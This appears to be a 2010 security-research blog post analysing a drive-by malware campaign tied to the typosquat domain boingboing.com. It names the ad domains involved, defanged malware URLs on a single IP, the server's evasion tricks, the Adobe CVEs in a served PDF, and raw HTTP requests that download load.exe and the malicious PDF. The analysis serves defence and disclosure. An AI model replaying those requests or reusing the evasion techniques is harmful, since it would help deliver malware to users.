Beware of BoingBoing.com - Malware Infection Lies Within !

Recent trends of malware are targeting advertisement websites. Nonetheless, the drive by download is still the most preferable choice of the malware writers. The reason behind targeting the advertisement domains is to favor the process of chain infection as content is included from the different websites as part of third party content sharing. Our analysis deduced the fact that websites following this information sharing model are getting infected more frequently.

The alias of domain names creates stringent problems. In this analysis the boingboing.com has similar naming structure as boingboing.net except the difference in the commercial and network nature of domains. We feel this is a higher threat due to the very popular site boingboing.net. Since many people attempting to go to boingboing.net will enter boingboing.com. This is a very lucrative target for the malware writers.

Now a days the information flow is centralized due to the social networking. A single malicious link posted on any social networking websites such as Facebook,Twitter etc results in diversified way of exploitation. This is a great method of serving malware via links in email/twitter/facebook as boingboing.com is very close to the legitimate site.

The latest infection has been noticed in the boingboing.com website parked on Network Solutions, which provides centralized information from different domains as a part of online marketing and business. Any third party website, which hosts the boingboing.com tagged with Iframes will serve the malware. The same has been analyzed during the inline tracing of boinboing.com. Well, it is true that malware writers follow different bypassing patterns which make the analytical process hard to trace the malware that is triggered through drive by download technique. The boingboing.com serves malware in an indirect way but the domain does not host malware itself. The boingboing,com includes content from different third party websites which serve the trading slogans and inline advertisements. Some of the third party websites are as follows:

hxxp://new.cnzz.com/
hxxp://www.xt918.com
hxxp://yule.86sousuo.com
hxxp://u.1133.cc/
hxxp://tfwenjian.seoue.com


All the third party websites listed above provide content to the boingboing.com. Whenever a request is generated in favor of boingboing.com, the requisite content is fetched from different domains to serve the purpose. On effective HTTP debugging and continuously monitoring of inbound/outbound traffic, it is detected that tfwenjan.seoue.com is showing some suspicious behavior. After detailed analysis, it is confirmed that the below listed web pages hold a trace of malicious content which provides drive by downloads through following links:



The webpage which served this malware is hxxp://tfwenjian.seoue.com/js/openqq/cnzzcount.html

At this point, it is assured that these links trigger malware infection. But there is certain stringency in order to get the malware downloaded in a reliable way. The reasons are mentioned below:

1.The domain (91.203.5.25) is actually using IP Logging Detection (IPLD) trick which enables it to track the user who is downloading the malware. On the contrary, the malware is served to a specific IP address only once. The domain does not serve the malware if the IP is already logged into the malware domain. Every time, IP address has to be iterated to prove the uniqueness of identity in order to download the malware.

2. The domain is serving three primary links for infection. One of the link (hxxp://91.203.5.25/exemple.com/error.js.php) is following a Time Elapsing (TE) trick in order to start the infection in certain time period and after that it becomes dead. It is not serving the malware continuously but the other link (hxxp://91.203.5.25:84/exemple.com/load.php?spl=mdac) is live and serving without any hassles. The third link (hxxp://91.203.5.25:84/exemple.com/pdf.php ) serves a malicious PDF with specific characteristics and nginx server forces that PDF to open directly in the browser for exploiting certain versions of Abode PDF. Basically, it aims at exploiting the Adobe Plug-in interface through browser rather standalone PDF document.

3. The malware domain (91.203.5.25) is also showing a discreet behavior by putting a check on downloading of malware if a request does not contain a specific entitled User Agent. Actually, the domain is using a User Agent Fingerprinting and Redirection (UAFR) trick to detect the type of browser which is sending the request. This is done to infect the systems in a targeted manner. In this case, the malware is served specifically for Internet Explorer (6, 7 and 8) versions. We tried different browsers in order to analyze the differential behavior but that did not serve the purpose. So appropriate environment is required in order to download this type of malware.

The following request serve the error,js

GET /exemple.com/exploit.js.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 91.203.5.25:84
Proxy-Connection: Keep-Alive


The webpage consists of a link which is passed as a value to a variable (var lODdsP2rvBM6gXjWtM='hxxp://91.203.5.25:84/exemple.com/load.php?spl=mdac';) that downloads the load.exe to initiate the exploitation. The links are attached back to back. The following request results in downloading of load.exe into the system provided IP address has to be unique every time

GET /exemple.com/load.php?spl=mdac HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 91.203.5.25:84
Proxy-Connection: Keep-Alive




The load.exe (packed with UPS packer) is downloaded into the system which carries an exploit for MDAC (Microsoft Data Access Component).

On further part, the below mentioned request serves a malicious PDF as

GET /exemple.com/pdf.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 91.203.5.25:84
Proxy-Connection: Keep-Alive


The response returned by Nginx server is as follows

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 22 May 2010 04:22:58 GMT
Content-Type: application/pdf
Connection: close
X-Powered-By: PHP/5.3.2
Accept-Ranges: bytes
Content-Length: 11032
Content-Disposition: inline; filename=0ad42d.pdf


It served 0ad42d.pdf file. The fact to notice in the downloading of this file is that, Content-Disposition parameter is set to inline which forces the PDF to open in the browser in order to exploit. Most of these malicious PDF’s are designed as reliable exploits which does not show any infection but exploits the system silently. The malicious PDF contains exploits as stated below

CVE-2007-5659 Adobe Collab overflow Multiple Adobe Reader and Acrobat buffer overflows

CVE-2008-2992 Adobe util.printf overflow Stack-based buffer overflow in Adobe Acrobat and Reader via crafted format string argument in util.printf

CVE-2009-0927 Adobe getIcon Stack-based buffer overflow in Adobe Reader and Acrobat via the getIcon method of a Collab object

CVE-2009-4324 doc.media.newPlayer Use-after-free vulnerability in the Doc.media.newPlayer method in Adobe Reader and Acrobat 8.0 through 9.2



Note: HackAlert's on the fly behavioral analysis produces an efficient way to detect malware from the websites. This case is scrutinized with the automated solution which gives the same positive result.

Inference:Regular day to day vulnerabilities provide a wide attack surface for crafting malicious documents and files in order to infect systems. In this case study, we have noticed that how third part infection impacts the websites in full. Even if the primary domain is not infected but the chain infection still works by utilizing the default model of HTTP.

Disclaimer:
This analysis provides true information. Differential changes can be expected in the malware working with the passage of time.

Analysis has been performed by : Aditya K Sood, Jeremy Chiu and ASF team collaboratively.

0 comments:

Post a Comment